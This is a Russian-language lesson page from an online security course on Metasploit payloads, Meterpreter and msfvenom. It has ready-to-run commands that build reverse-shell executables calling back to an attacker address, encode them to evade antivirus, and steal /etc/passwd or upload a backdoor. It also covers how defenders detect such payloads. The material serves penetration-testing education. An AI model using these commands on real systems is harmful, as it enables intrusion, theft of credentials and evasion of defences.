0Pricing
Cyber Security Academy · Урок

Полезные нагрузки: поэтапные и цельные, Meterpreter

Выбирайте подходящую полезную нагрузку для конкретного сценария и используйте Meterpreter после эксплуатации.

«Полезные нагрузки: поэтапные и цельные, Meterpreter» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 3 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.

Что такое полезная нагрузка

Полезная нагрузка — это код, который выполняется на цели после успешного эксплойта. Она определяет, что получает атакующий: оболочку, выполнение команд, доступ к файлам или полнофункциональный агент, например Meterpreter.

Многоэтапные и безэтапные полезные нагрузки

Безэтапные полезные нагрузки (/) содержат всё в одном двоичном файле — они больше, но проще и не требуют сетевого обратного вызова после первоначальной доставки. Многоэтапные полезные нагрузки (//) сначала отправляют небольшой загрузчик, который скачивает второй этап от обработчика.

# Stageless (single slash naming):
windows/x64/shell_reverse_tcp

# Staged (double slash naming):
windows/x64/shell/reverse_tcp
#                 ^
#                 stage 2 downloaded after stager connects

Когда использовать каждый вариант

Используйте безэтапные полезные нагрузки, если после первоначального эксплойта у цели нет доступа к интернету или обработчику — полезная нагрузка должна быть самодостаточной. Используйте многоэтапные, если вам нужна небольшая первоначальная полезная нагрузка и есть надёжное соединение с обработчиком.

Обзор Meterpreter

Meterpreter — это усовершенствованная полезная нагрузка Metasploit: она полностью работает в памяти, использует шифрованные соединения и предоставляет расширенный API для доступа к файловой системе, переноса процессов, перехвата нажатий клавиш, создания снимков экрана и перемещения через промежуточные узлы.

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > run

Команды Meterpreter

Основные команды Meterpreter для постэксплуатации: сведения о системе, список процессов, операции с файлами и работа с сетью.

meterpreter > sysinfo          # system information
meterpreter > getuid           # current user
meterpreter > ps               # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell            # drop to OS shell

Перенос процесса

Перенесите процесс Meterpreter в более стабильный или менее подозрительный процесс (например, explorer.exe в Windows). Это также может повысить привилегии при переносе в процесс с более высоким уровнем привилегий.

meterpreter > ps
meterpreter > migrate 1234     # migrate to PID 1234

# Migrate to explorer.exe for stability
# Avoids termination if original process exits

Создание полезных нагрузок с помощью msfvenom

msfvenom создаёт отдельные файлы полезной нагрузки (EXE, ELF, APK и шелл-код) для доставки через фишинг, оставленные USB-накопители или веб-шеллы в рамках санкционированных проверок.

# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -f exe -o payload.exe

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -f elf -o payload.elf

Multi/Handler для получения оболочек

Вспомогательный модуль multi/handler принимает обратные подключения оболочки. Перед доставкой полезной нагрузки настройте его с теми же полезной нагрузкой, LHOST и LPORT, которые использовались в msfvenom.

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j      # run as background job

Основы кодирования и обхода защиты

Кодировщики msfvenom могут обфусцировать полезные нагрузки, чтобы обойти базовое обнаружение AV по сигнатурам. Обратите внимание: современные решения EDR используют поведенческое обнаружение — одних кодировщиков недостаточно против продвинутых средств защиты.

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -e x64/xor_dynamic -i 5 \
  -f exe -o encoded_payload.exe

Обратные и привязанные полезные нагрузки

Обратные полезные нагрузки подключаются от цели к атакующему (что лучше работает при использовании NAT и межсетевых экранов). Привязанные полезные нагрузки прослушивают соединения на цели — атакующий подключается к ним. В большинстве сценариев предпочтительны обратные полезные нагрузки.

Обнаружение полезных нагрузок защитниками

Защитники обнаруживают Meterpreter с помощью сетевых сигнатур (характерные шаблоны трафика управления и контроля), сканирования памяти (артефакты отражающей инъекции DLL) и поведенческого анализа (опустошение процессов, необычные связи между родительскими и дочерними процессами).

Быстрая проверка

Чем многоэтапная полезная нагрузка в Metasploit отличается от безэтапной?

Итоги: полезные нагрузки и Meterpreter

Выбирайте многоэтапные полезные нагрузки для небольшого первоначального объёма и безэтапные — для самодостаточной доставки. Meterpreter — наиболее функциональная полезная нагрузка для постэксплуатации: работающая в памяти, шифрованная и расширяемая. Используйте msfvenom для создания отдельных двоичных файлов и всегда настраивайте multi/handler для приёма обратных подключений.

Часто задаваемые вопросы

Урок «Полезные нагрузки: поэтапные и цельные, Meterpreter» бесплатный?

Да — полный текст урока «Полезные нагрузки: поэтапные и цельные, Meterpreter» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.

Чему я научусь в уроке «Полезные нагрузки: поэтапные и цельные, Meterpreter»?

Выбирайте подходящую полезную нагрузку для конкретного сценария и используйте Meterpreter после эксплуатации. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.

Нужен ли мне опыт, чтобы начать Cyber Security Academy?

Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 3 из 4.

Сколько времени занимает урок «Полезные нагрузки: поэтапные и цельные, Meterpreter»?

Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.

Можно ли писать и запускать код в этом уроке Cyber Security Academy?

Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.

Все уроки этого курса

  1. Архитектура Metasploit и msfconsole
  2. Эксплуатация известной уязвимости
  3. Полезные нагрузки: поэтапные и цельные, Meterpreter
  4. Постэксплуатация: перемещение и закрепление
← Назад к Cyber Security Academy